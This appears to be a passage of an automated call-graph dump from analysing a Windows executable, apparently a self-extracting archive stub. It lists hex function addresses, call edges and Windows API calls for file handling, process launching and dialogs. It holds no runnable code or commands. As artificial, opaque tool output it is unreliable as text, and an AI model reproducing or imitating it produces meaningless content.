103 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26178->26329 26184 92a656 26181->26184 26342 92240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26181->26342 26183 92a764 26183->26185 26187 92c2e5 8 API calls 26183->26187 26184->26183 26184->26185 26186 92a712 26184->26186 26298 92b949 SetEndOfFile 26184->26298 26185->26133 26299 92b7e2 26186->26299 26188 92a7bf 26187->26188 26188->26185 26343 92240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26188->26343 26191 92a759 26193 92afd0 77 API calls 26191->26193 26193->26183 26194 92a7cf 26344 927d49 76 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26194->26344 26197 9216dc Concurrency::cancel_current_task 26196->26197 26198 9216ca 26196->26198 26200 922179 26 API calls 26197->26200 26198->26197 26456 921729 26 API calls 26198->26456 26201 92170b 26200->26201 26457 92eea4 86 API calls Concurrency::cancel_current_task 26201->26457 26205 92b999 26204->26205 26206 92b9a3 26205->26206 26458 927c87 78 API calls 26205->26458 26206->26015 26209 92cc65 _abort 26208->26209 26216 92cb21 26209->26216 26214 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26215 92cc95 26214->26215 26215->26050 26223 92cb02 26216->26223 26218 92cb96 26219 922179 26218->26219 26220 922193 26219->26220 26221 922184 26219->26221 26220->26214 26227 9213db 26 API calls Concurrency::cancel_current_task 26221->26227 26224 92cb10 26223->26224 26225 92cb0b 26223->26225 26224->26218 26226 922179 26 API calls 26225->26226 26226->26224 26227->26220 26233 9218b2 26228->26233 26231->26053 26232->26063 26234 9218c4 26233->26234 26241 921476 26233->26241 26235 9218ed 26234->26235 26243 927bad 76 API calls 2 library calls 26234->26243 26237 9466ae 22 API calls 26235->26237 26239 92190a 26237->26239 26238 9218e3 26244 927c32 75 API calls 26238->26244 26239->26241 26245 927c32 75 API calls 26239->26245 26241->26068 26243->26238 26244->26235 26245->26241 26247 9402ac 26246->26247 26248 930597 53 API calls 26247->26248 26249 9402da 26248->26249 26250 924c00 _swprintf 51 API calls 26249->26250 26251 9402ec 26250->26251 26252 93f7fc 21 API calls 26251->26252 26253 9402fd 26252->26253 26254 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26253->26254 26255 933d08 26254->26255 26255->26028 26256->26083 26257->26083 26258->26085 26260 926946 26259->26260 26347 926852 26260->26347 26262 9269b1 26262->26100 26263 926979 26263->26262 26352 92d122 6 API calls 3 library calls 26263->26352 26268 92d644 26265->26268 26266 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26267 92d7d8 26266->26267 26267->26104 26268->26266 26271 928f99 26269->26271 26270 928fd1 26270->26110 26270->26113 26270->26117 26271->26270 26363 927e25 74 API calls 26271->26363 26273 928fc9 26364 921407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26273->26364 26276 92c95b 26275->26276 26278 92c965 26275->26278 26277 94121c 27 API calls 26276->26277 26277->26278 26278->26143 26280 935405 26279->26280 26283 93540f ___std_exception_copy 26279->26283 26365 927c32 75 API calls 26280->26365 26282 9354b9 _abort 26282->26162 26283->26282 26284 93553f 26283->26284 26288 935495 26283->26288 26367 9447d0 RaiseException 26284->26367 26287 93556b 26366 935323 75 API calls 3 library calls 26288->26366 26290 9350a2 26289->26290 26291 9350cb 26289->26291 26292 9350c1 26290->26292 26294 9350b7 26290->26294 26297 9350bf 26290->26297 26291->26297 26384 937576 137 API calls 2 library calls 26291->26384 26383 938250 132 API calls 26292->26383 26368 938c7e 26294->26368 26297->26176 26298->26186 26300 92b802 26299->26300 26301 92b7f3 26299->26301 26303 92b87f SetFileTime 26300->26303 26301->26300 26302 92b7f9 FlushFileBuffers 26301->26302 26302->26300 26303->26191 26304->26091 26305->26109 26306->26102 26307->26106 26308->26137 26309->26137 26310->26137 26311->26137 26312->26137 26313->26145 26314->26122 26315->26130 26316->26145 26317->26125 26318->26130 26320 92b291 GetFileType 26319->26320 26321 92a1ba 26319->26321 26320->26321 26321->26128 26322 92240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26321->26322 26322->26149 26323->26128 26324->26152 26325->26176 26326->26176 26327->26175 26328->26176 26329->26176 26331 92ab8d __EH_prolog3 26330->26331 26452 928fdb 26331->26452 26334 92145d 78 API calls 26335 92ab9b 26334->26335 26336 92f0d7 132 API calls 26335->26336 26337 92abae 26336->26337 26338 92abf6 26337->26338 26340 92f0d7 132 API calls 26337->26340 26455 92f2c3 97 API calls __InternalCxxFrameHandler 26337->26455 26338->26176 26340->26337 26341->26181 26342->26184 26343->26194 26344->26185 26345->26110 26346->26110 26353 926731 26347->26353 26349 926873 26349->26263 26351 926731 6 API calls 26351->26349 26352->26263 26354 92673b 26353->26354 26355 92d63a 5 API calls 26354->26355 26356 926765 26355->26356 26359 92d63a 5 API calls 26356->26359 26361 926833 26356->26361 26362 92d122 6 API calls 3 library calls 26356->26362 26357 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26358 926845 26357->26358 26358->26349 26358->26351 26359->26356 26361->26357 26362->26356 26363->26273 26364->26270 26365->26283 26366->26282 26367->26287 26385 935617 26368->26385 26371 9390ae 26411 93725b 98 API calls __InternalCxxFrameHandler 26371->26411 26373 9390be __InternalCxxFrameHandler 26374 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26373->26374 26375 939108 26374->26375 26375->26297 26376 938c9d __InternalCxxFrameHandler 26376->26371 26389 92f0d7 26376->26389 26400 93306d 26376->26400 26406 935e86 132 API calls 26376->26406 26407 939111 132 API calls 26376->26407 26408 9332af 81 API calls 26376->26408 26409 935991 98 API calls __InternalCxxFrameHandler 26376->26409 26410 93976f 137 API calls __InternalCxxFrameHandler 26376->26410 26383->26297 26384->26297 26387 935623 __EH_prolog3 _abort ___std_exception_copy 26385->26387 26386 935709 26386->26376 26387->26386 26412 927c32 75 API calls 26387->26412 26397 92f0ed __InternalCxxFrameHandler 26389->26397 26390 92f25d 26391 92f291 26390->26391 26413 92f08e 26390->26413 26393 92f2b2 26391->26393 26419 926c92 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26391->26419 26420 932ee4 26393->26420 26397->26390 26398 92f254 26397->26398 26417 92ca4c 91 API calls __EH_prolog3 26397->26417 26418 93ab94 117 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26397->26418 26398->26376 26401 933079 26400->26401 26402 93307e 26400->26402 26436 933105 26401->26436 26404 93308e 26402->26404 26444 9332af 81 API calls 26402->26444 26404->26376 26406->26376 26407->26376 26408->26376 26409->26376 26410->26376 26411->26373 26412->26387 26414 92f0d3 26413->26414 26415 92f096 26413->26415 26414->26391 26415->26414 26426 933ca6 26415->26426 26417->26397 26418->26397 26419->26393 26421 932eeb 26420->26421 26422 932f06 26421->26422 26434 927ba8 RaiseException _com_raise_error 26421->26434 26424 932f17 SetThreadExecutionState 26422->26424 26435 927ba8 RaiseException _com_raise_error 26422->26435 26424->26398 26429 94017f 26426->26429 26430 9322ef 26429->26430 26431 940196 SendDlgItemMessageW 26430->26431 26432 93d864 PeekMessageW GetMessageW IsDialogMessageW TranslateMessage DispatchMessageW 26431->26432 26433 933cc6 26432->26433 26433->26414 26434->26422 26435->26424 26440 93317e 26436->26440 26441 933110 26436->26441 26437 933115 CreateThread 26437->26441 26448 933240 26437->26448 26438 93316d SetThreadPriority 26438->26441 26440->26402 26441->26437 26441->26438 26441->26440 26445 927bad 76 API calls 2 library calls 26441->26445 26446 927d49 76 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26441->26446 26447 927ba8 RaiseException _com_raise_error 26441->26447 26444->26404 26445->26441 26446->26441 26447->26441 26451 93324e 84 API calls 26448->26451 26450 933249 26451->26450 26453 92d076 6 API calls 26452->26453 26454 928fe0 26453->26454 26454->26334 26455->26337 26458->26206 26460 92c4b2 26459->26460 26461 92c4e5 FindFirstFileW 26460->26461 26462 92c548 FindNextFileW 26460->26462 26463 92c4f2 26461->26463 26471 92c52d 26461->26471 26464 92c553 GetLastError 26462->26464 26462->26471 26465 92da1e 6 API calls 26463->26465 26464->26471 26466 92c505 26465->26466 26467 92c522 GetLastError 26466->26467 26468 92c509 FindFirstFileW 26466->26468 26467->26471 26468->26467 26468->26471 26469 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26470 92c39f 26469->26470 26470->26038 26470->26039 26471->26469 26472->25978 26476 9343a0 26473->26476 26474 9343b9 26480 932fc9 86 API calls 26474->26480 26475 9343cd 26476->26474 26476->26475 26478 9343c0 Concurrency::cancel_current_task 26478->26475 26480->26478 26481->25881 26482->25881 26483->25883 26485 92b982 78 API calls 26484->26485 26486 9220f7 26485->26486 26487 922114 26486->26487 26488 921b63 116 API calls 26486->26488 26487->25899 26487->25900 26489 922104 26488->26489 26489->26487 26495 921407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26489->26495 26492 921b1e 26491->26492 26494 921b1a 26491->26494 26496 921a55 26492->26496 26494->25907 26495->26487 26497 921a67 26496->26497 26499 921aa4 26496->26499 26498 92441e 116 API calls 26497->26498 26502 921a87 26498->26502 26504 9248bd 26499->26504 26502->26494 26508 9248c6 26504->26508 26505 92441e 116 API calls 26505->26508 26506 921ac5 26506->26502 26509 921fb0 26506->26509 26507 932ee4 2 API calls 26507->26508 26508->26505 26508->26506 26508->26507 26510 921fbc __EH_prolog3 26509->26510 26521 9244ab 26510->26521 26513 9218b2 78 API calls 26514 921ff0 26513->26514 26553 92199b 78 API calls 26514->26553 26516 922060 26516->26502 26517 922008 26518 922014 _wcslen 26517->26518 26554 933d10 MultiByteToWideChar 26517->26554 26555 92199b 78 API calls 26518->26555 26522 9244c6 26521->26522 26523 924510 26522->26523 26524 9244f4 26522->26524 26526 92476a 26523->26526 26529 92453c 26523->26529 26556 921407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26524->26556 26562 921407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26526->26562 26528 9244ff 26530 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26528->26530 26529->26528 26532 9353f0 75 API calls 26529->26532 26531 921fdf 26530->26531 26531->26513 26531->26516 26538 924589 26532->26538 26533 9245bb 26535 924646 26533->26535 26552 9245b2 26533->26552 26559 92f014 97 API calls 26533->26559 26534 9245b7 26534->26533 26558 9225da 78 API calls 26534->26558 26536 92c94d 27 API calls 26535->26536 26540 924659 26536->26540 26537 9245a7 26557 921407 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26537->26557 26538->26533 26538->26534 26538->26537 26544 9246f2 26540->26544 26545 9246e2 26540->26545 26542 934396 86 API calls 26542->26528 26547 935099 137 API calls 26544->26547 26546 92ab81 137 API calls 26545->26546 26548 9246f0 26546->26548 26547->26548 26560 92c905 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26548->26560 26550 92472a 26550->26552 26561 92240a 74 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26550->26561 26552->26542 26553->26517 26554->26518 26555->26516 26556->26528 26557->26552 26558->26533 26559->26535 26560->26550 26561->26552 26562->26528 26657 94daed 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26660 942610 RaiseException _com_raise_error _com_error::_com_error 26590 93c000 28 API calls 26591 924c20 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26665 922620 97 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26666 94ca20 21 API calls 2 library calls 26593 921025 29 API calls 26594 951850 51 API calls 25409 92b45f 25414 92b469 25409->25414 25410 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25411 92b50b 25410->25411 25412 92b5dd SetFilePointer 25413 92b5fa GetLastError 25412->25413 25415 92b48d 25412->25415 25413->25415 25414->25412 25414->25415 25416 92b5b6 25414->25416 25418 92b1e6 25414->25418 25415->25410 25416->25412 25419 92b1ff 25418->25419 25421 92b8c0 79 API calls 25419->25421 25420 92b231 25420->25416 25421->25420 25511 93f05c 25517 93f07f 25511->25517 25512 93d5dd 6 API calls 25524 93ea83 _wcslen _wcsrchr 25512->25524 25514 93f717 25515 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25514->25515 25516 93f732 25515->25516 25517->25524 25542 93fafc 25517->25542 25518 93ed57 SetWindowTextW 25518->25524 25520 92dd18 5 API calls 25520->25524 25522 9466ae 22 API calls 25522->25524 25524->25512 25524->25514 25524->25518 25524->25520 25524->25522 25525 93eb4b SetFileAttributesW 25524->25525 25530 93d41c 100 API calls 25524->25530 25533 93f73c 25524->25533 25538 93ef75 SendMessageW 25524->25538 25563 93c5dd GetCurrentDirectoryW 25524->25563 25565 92c3de 11 API calls 25524->25565 25566 92c367 FindClose 25524->25566 25567 93d76e 76 API calls 3 library calls 25524->25567 25526 93ec05 GetFileAttributesW 25525->25526 25541 93eb65 _abort _wcslen 25525->25541 25526->25524 25529 93ec17 DeleteFileW 25526->25529 25529->25524 25531 93ec28 25529->25531 25532 93ef35 GetDlgItem SetWindowTextW SendMessageW 25530->25532 25536 924c00 _swprintf 51 API calls 25531->25536 25532->25524 25568 9413f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25533->25568 25535 93f741 25537 93ec48 GetFileAttributesW 25536->25537 25537->25531 25539 93ec5d MoveFileW 25537->25539 25538->25524 25539->25524 25540 93ec75 MoveFileExW 25539->25540 25540->25524 25541->25524 25541->25526 25564 92d8ac 51 API calls 2 library calls 25541->25564 25548 93fb06 _abort _wcslen 25542->25548 25543 93fd7e 25544 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25543->25544 25545 93fd8f 25544->25545 25545->25524 25548->25543 25569 92bccb 25548->25569 25549 93fc73 ShellExecuteExW 25549->25543 25554 93fc86 25549->25554 25551 93fc6b 25551->25549 25552 93fcb8 25573 94004d 6 API calls 25552->25573 25553 93fd0e CloseHandle 25555 93fd1c 25553->25555 25554->25552 25554->25553 25556 93fcae ShowWindow 25554->25556 25555->25543 25559 93fd75 ShowWindow 25555->25559 25556->25552 25558 93fcd0 25558->25553 25560 93fce3 GetExitCodeProcess 25558->25560 25559->25543 25560->25553 25561 93fcf6 25560->25561 25561->25553 25563->25524 25564->25541 25565->25524 25566->25524 25567->25524 25568->25535 25574 92bcdd 25569->25574 25572 92d563 8 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25572->25551 25573->25558 25575 941590 25574->25575 25576 92bcea GetFileAttributesW 25575->25576 25577 92bd07 25576->25577 25578 92bd2c 25576->25578 25579 92da1e 6 API calls 25577->25579 25580 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25578->25580 25581 92bd19 25579->25581 25582 92bcd4 25580->25582 25581->25578 25583 92bd1d GetFileAttributesW 25581->25583 25582->25549 25582->25572 25583->25578 25590 94d240 25591 94d24b 25590->25591 25592 94d55a 11 API calls 25591->25592 25593 94d274 25591->25593 25594 94d270 25591->25594 25592->25591 25596 94d2a0 DeleteCriticalSection 25593->25596 25596->25594 26597 94239f 9 API calls 2 library calls 26601 948870 QueryPerformanceFrequency QueryPerformanceCounter 26668 951a71 21 API calls __vswprintf_c_l 26602 921075 44 API calls 25605 94067c 14 API calls ___delayLoadHelper2@8 26671 92af90 80 API calls Concurrency::cancel_current_task 26672 93c390 GdipDisposeImage GdipFree 26606 954590 CloseHandle 24319 94e180 24320 94e189 24319->24320 24321 94e192 24319->24321 24323 94e077 24320->24323 24343 94b9a5 GetLastError 24323->24343 24325 94e084 24363 94e19e 24325->24363 24327 94e08c 24372 94de0b 24327->24372 24330 94e0a3 24330->24321 24333 94e0e6 24397 94bafa 24333->24397 24337 94e0e1 24396 94bc7b 20 API calls __dosmaperr 24337->24396 24339 94e12a 24339->24333 24403 94dce1 26 API calls 24339->24403 24340 94e0fe 24340->24339 24341 94bafa _free 20 API calls 24340->24341 24341->24339 24344 94b9c1 24343->24344 24345 94b9bb 24343->24345 24350 94ba10 SetLastError 24344->24350 24405 94d786 24344->24405 24404 94d4ab 11 API calls 2 library calls 24345->24404 24349 94b9db 24352 94bafa _free 20 API calls 24349->24352 24350->24325 24354 94b9e1 24352->24354 24353 94b9f0 24353->24349 24355 94b9f7 24353->24355 24356 94ba1c SetLastError 24354->24356 24413 94b810 20 API calls _abort 24355->24413 24414 94b584 38 API calls _abort 24356->24414 24359 94ba02 24361 94bafa _free 20 API calls 24359->24361 24362 94ba09 24361->24362 24362->24350 24362->24356 24364 94e1aa __FrameHandler3::FrameUnwindToState 24363->24364 24365 94b9a5 _abort 38 API calls 24364->24365 24367 94e1b4 24365->24367 24368 94e238 _abort 24367->24368 24371 94bafa _free 20 API calls 24367->24371 24417 94b584 38 API calls _abort 24367->24417 24418 94d281 EnterCriticalSection 24367->24418 24419 94e22f LeaveCriticalSection _abort 24367->24419 24368->24327 24371->24367 24420 946dd4 24372->24420 24375 94de2c GetOEMCP 24377 94de55 24375->24377 24376 94de3e 24376->24377 24378 94de43 GetACP 24376->24378 24377->24330 24379 94bc8e 24377->24379 24378->24377 24380 94bccc 24379->24380 24385 94bc9c _abort 24379->24385 24431 94bc7b 20 API calls __dosmaperr 24380->24431 24382 94bcb7 RtlAllocateHeap 24383 94bcca 24382->24383 24382->24385 24383->24333 24386 94e240 24383->24386 24385->24380 24385->24382 24430 94a2ec 7 API calls 2 library calls 24385->24430 24387 94de0b 40 API calls 24386->24387 24389 94e25f 24387->24389 24391 94e2b0 IsValidCodePage 24389->24391 24393 94e266 24389->24393 24395 94e2d5 _abort 24389->24395 24390 94e0d9 24390->24337 24390->24340 24392 94e2c2 GetCPInfo 24391->24392 24391->24393 24392->24393 24392->24395 24442 9410f9 24393->24442 24432 94dee3 GetCPInfo 24395->24432 24396->24333 24398 94bb05 RtlFreeHeap 24397->24398 24399 94bb2e _free 24397->24399 24398->24399 24400 94bb1a 24398->24400 24399->24330 24523 94bc7b 20 API calls __dosmaperr 24400->24523 24402 94bb20 GetLastError 24402->24399 24403->24333 24404->24344 24410 94d793 _abort 24405->24410 24406 94d7d3 24416 94bc7b 20 API calls __dosmaperr 24406->24416 24407 94d7be RtlAllocateHeap 24408 94b9d3 24407->24408 24407->24410 24408->24349 24412 94d501 11 API calls 2 library calls 24408->24412 24410->24406 24410->24407 24415 94a2ec 7 API calls 2 library calls 24410->24415 24412->24353 24413->24359 24415->24410 24416->24408 24418->24367 24419->24367 24421 946df1 24420->24421 24427 946de7 24420->24427 24422 94b9a5 _abort 38 API calls 24421->24422 24421->24427 24423 946e12 24422->24423 24428 94bf86 38 API calls __cftof 24423->24428 24425 946e2b 24429 94bfb3 38 API calls __cftof 24425->24429 24427->24375 24427->24376 24428->24425 24429->24427 24430->24385 24431->24383 24433 94df1d 24432->24433 24434 94dfc7 24432->24434 24449 94efd8 24433->24449 24436 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24434->24436 24438 94e073 24436->24438 24438->24393 24441 94d1c8 __vswprintf_c_l 43 API calls 24441->24434 24443 941101 24442->24443 24444 941102 IsProcessorFeaturePresent 24442->24444 24443->24390 24446 941314 24444->24446 24522 9412d7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 24446->24522 24448 9413f7 24448->24390 24450 946dd4 __cftof 38 API calls 24449->24450 24451 94eff8 MultiByteToWideChar 24450->24451 24453 94f0ce 24451->24453 24454 94f036 24451->24454 24455 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24453->24455 24456 94f057 _abort __vsnwprintf_l 24454->24456 24457 94bc8e __vswprintf_c_l 21 API calls 24454->24457 24458 94df7e 24455->24458 24459 94f0c8 24456->24459 24461 94f09c MultiByteToWideChar 24456->24461 24457->24456 24463 94d1c8 24458->24463 24468 94d213 20 API calls _free 24459->24468 24461->24459 24462 94f0b8 GetStringTypeW 24461->24462 24462->24459 24464 946dd4 __cftof 38 API calls 24463->24464 24465 94d1db 24464->24465 24469 94cfab 24465->24469 24468->24453 24470 94cfc6 __vswprintf_c_l 24469->24470 24471 94cfec MultiByteToWideChar 24470->24471 24472 94d016 24471->24472 24473 94d1a0 24471->24473 24476 94bc8e __vswprintf_c_l 21 API calls 24472->24476 24479 94d037 __vsnwprintf_l 24472->24479 24474 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24473->24474 24475 94d1b3 24474->24475 24475->24441 24476->24479 24477 94d080 MultiByteToWideChar 24478 94d0ec 24477->24478 24480 94d099 24477->24480 24505 94d213 20 API calls _free 24478->24505 24479->24477 24479->24478 24496 94d5bc 24480->24496 24484 94d0c3 24484->24478 24487 94d5bc __vswprintf_c_l 11 API calls 24484->24487 24485 94d0fb 24488 94bc8e __vswprintf_c_l 21 API calls 24485->24488 24491 94d11c __vsnwprintf_l 24485->24491 24486 94d191 24504 94d213 20 API calls _free 24486->24504 24487->24478 24488->24491 24489 94d5bc __vswprintf_c_l 11 API calls 24492 94d170 24489->24492 24491->24486 24491->24489 24492->24486 24493 94d17f WideCharToMultiByte 24492->24493 24493->24486 24494 94d1bf 24493->24494 24506 94d213 20 API calls _free 24494->24506 24507 94d2e8 24496->24507 24500 94d62c LCMapStringW 24501 94d5ec 24500->24501 24502 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24501->24502 24503 94d0b0 24502->24503 24503->24478 24503->24484 24503->24485 24504->24478 24505->24473 24506->24478 24508 94d318 24507->24508 24511 94d314 24507->24511 24508->24501 24514 94d644 10 API calls 3 library calls 24508->24514 24510 94d344 GetProcAddress 24512 94d354 _abort 24510->24512 24511->24508 24513 94d338 24511->24513 24515 94d384 24511->24515 24512->24508 24513->24508 24513->24510 24514->24500 24516 94d3a5 LoadLibraryExW 24515->24516 24521 94d39a 24515->24521 24517 94d3c2 GetLastError 24516->24517 24520 94d3da 24516->24520 24519 94d3cd LoadLibraryExW 24517->24519 24517->24520 24518 94d3f1 FreeLibrary 24518->24521 24519->24520 24520->24518 24520->24521 24521->24511 24522->24448 24523->24402 26607 942580 LocalFree 24524 940782 24525 940686 24524->24525 24527 940d3a 24525->24527 24553 940a98 24527->24553 24529 940d4a 24530 940da7 24529->24530 24540 940dcb 24529->24540 24531 940cd8 DloadReleaseSectionWriteAccess 6 API calls 24530->24531 24532 940db2 RaiseException 24531->24532 24549 940fa0 24532->24549 24533 940e43 LoadLibraryExA 24534 940ea4 24533->24534 24535 940e56 GetLastError 24533->24535 24539 940eaf FreeLibrary 24534->24539 24541 940eb6 24534->24541 24536 940e7f 24535->24536 24544 940e69 24535->24544 24542 940cd8 DloadReleaseSectionWriteAccess 6 API calls 24536->24542 24537 940f14 GetProcAddress 24538 940f72 24537->24538 24543 940f24 GetLastError 24537->24543 24562 940cd8 24538->24562 24539->24541 24540->24533 24540->24534 24540->24538 24540->24541 24541->24537 24541->24538 24545 940e8a RaiseException 24542->24545 24546 940f37 24543->24546 24544->24534 24544->24536 24545->24549 24546->24538 24548 940cd8 DloadReleaseSectionWriteAccess 6 API calls 24546->24548 24550 940f58 RaiseException 24548->24550 24549->24525 24551 940a98 ___delayLoadHelper2@8 6 API calls 24550->24551 24552 940f6f 24551->24552 24552->24538 24554 940aa4 24553->24554 24555 940aca 24553->24555 24570 940b41 24554->24570 24555->24529 24557 940aa9 24558 940ac5 24557->24558 24573 940c6a 24557->24573 24578 940acb GetModuleHandleW GetProcAddress GetProcAddress 24558->24578 24561 940d13 24561->24529 24563 940d0c 24562->24563 24564 940cea 24562->24564 24563->24549 24565 940b41 DloadReleaseSectionWriteAccess 3 API calls 24564->24565 24566 940cef 24565->24566 24567 940d07 24566->24567 24568 940c6a DloadProtectSection 3 API calls 24566->24568 24581 940d0e GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24567->24581 24568->24567 24579 940acb GetModuleHandleW GetProcAddress GetProcAddress 24570->24579 24572 940b46 24572->24557 24574 940c7f DloadProtectSection 24573->24574 24575 940cba VirtualProtect 24574->24575 24576 940c85 24574->24576 24580 940b80 VirtualQuery GetSystemInfo 24574->24580 24575->24576 24576->24558 24578->24561 24579->24572 24580->24575 24581->24563 26675 93d384 GetDlgItem EnableWindow ShowWindow SendMessageW 26676 93ea83 121 API calls 5 library calls 24718 92b9ba 24719 92b9c8 24718->24719 24720 92b9cf 24718->24720 24721 92b9dc GetStdHandle 24720->24721 24728 92b9eb 24720->24728 24721->24728 24722 92ba43 WriteFile 24722->24728 24723 92ba14 WriteFile 24724 92ba0f 24723->24724 24723->24728 24724->24723 24724->24728 24726 92bad5 24730 927e45 77 API calls 24726->24730 24728->24719 24728->24722 24728->24723 24728->24724 24728->24726 24729 927b1e 78 API calls 24728->24729 24729->24728 24730->24719 26610 9411bf 48 API calls _unexpected 26612 93cda0 73 API calls 24736 9221a5 24737 9221b0 24736->24737 24738 9221b8 24736->24738 24755 9221ca 27 API calls Concurrency::cancel_current_task 24737->24755 24740 9221b6 24738->24740 24742 94121c 24738->24742 24743 941221 ___std_exception_copy 24742->24743 24744 94123b 24743->24744 24746 94123d 24743->24746 24758 94a2ec 7 API calls 2 library calls 24743->24758 24744->24740 24747 924adb Concurrency::cancel_current_task 24746->24747 24749 941247 24746->24749 24756 9447d0 RaiseException 24747->24756 24759 9447d0 RaiseException 24749->24759 24750 924af7 24752 924b0d 24750->24752 24757 9213db 26 API calls Concurrency::cancel_current_task 24750->24757 24752->24740 24753 941de0 24755->24740 24756->24750 24757->24752 24758->24743 24759->24753 26682 93b3d0 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26683 93c3d0 GdipCloneImage GdipAlloc 24770 941bd2 24771 941bde __FrameHandler3::FrameUnwindToState 24770->24771 24802 94176c 24771->24802 24773 941be5 24774 941d38 24773->24774 24777 941c0f 24773->24777 24881 941fca IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24774->24881 24776 941d3f 24874 94a7aa 24776->24874 24784 941c4e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24777->24784 24813 94b34d 24777->24813 24787 941caf 24784->24787 24877 94a29c 38 API calls _abort 24784->24877 24785 941c2e 24821 9420e5 GetStartupInfoW _abort 24787->24821 24789 941cb5 24822 94b29e 51 API calls 24789->24822 24792 941cbd 24823 94037c 24792->24823 24796 941cd1 24796->24776 24797 941cd5 24796->24797 24798 941cde 24797->24798 24879 94a74d 28 API calls _abort 24797->24879 24880 9418dd 12 API calls ___scrt_uninitialize_crt 24798->24880 24801 941ce6 24801->24785 24803 941775 24802->24803 24883 941de6 IsProcessorFeaturePresent 24803->24883 24805 941781 24884 94507e 24805->24884 24807 941786 24808 94178a 24807->24808 24892 94b1d7 24807->24892 24808->24773 24811 9417a1 24811->24773 24814 94b364 24813->24814 24815 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24814->24815 24816 941c28 24815->24816 24816->24785 24817 94b2f1 24816->24817 24818 94b320 24817->24818 24819 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24818->24819 24820 94b349 24819->24820 24820->24784 24821->24789 24822->24792 24990 93290a 24823->24990 24827 9403aa 25046 93ccd9 24827->25046 24829 9403b3 _abort 24830 9403c6 GetCommandLineW 24829->24830 24831 9403d9 24830->24831 24832 94046a GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24830->24832 25050 93e872 24831->25050 24834 924c00 _swprintf 51 API calls 24832->24834 24836 9404e6 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24834->24836 25065 93d9dd LoadBitmapW 24836->25065 24838 940464 25057 93ffdd 24838->25057 24839 9403e7 OpenFileMappingW 24842 9403ff MapViewOfFile 24839->24842 24843 94045b CloseHandle 24839->24843 24845 940454 UnmapViewOfFile 24842->24845 24846 940410 __InternalCxxFrameHandler 24842->24846 24843->24832 24845->24843 24849 93ffdd 7 API calls 24846->24849 24851 94042c 24849->24851 25095 93136b 24851->25095 24852 93afe6 27 API calls 24854 940546 DialogBoxParamW 24852->24854 24858 940580 24854->24858 24857 94044b 24857->24845 24859 940592 Sleep 24858->24859 24860 940599 24858->24860 24859->24860 24863 9405a7 24860->24863 25111 93cf89 7 API calls 3 library calls 24860->25111 24862 9405c6 DeleteObject 24864 9405e2 24862->24864 24865 9405db DeleteObject 24862->24865 24863->24862 24866 940625 24864->24866 24867 940613 24864->24867 24865->24864 25092 93cd3f 24866->25092 25112 94004d 6 API calls 24867->25112 24870 940619 CloseHandle 24870->24866 24871 94065f 24872 9410f9 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24871->24872 24873 940673 24872->24873 24878 94211b GetModuleHandleW 24873->24878 25330 94a527 24874->25330 24877->24787 24878->24796 24879->24798 24880->24801 24881->24776 24883->24805 24896 946127 24884->24896 24887 945087 24887->24807 24889 94508f 24890 94509a 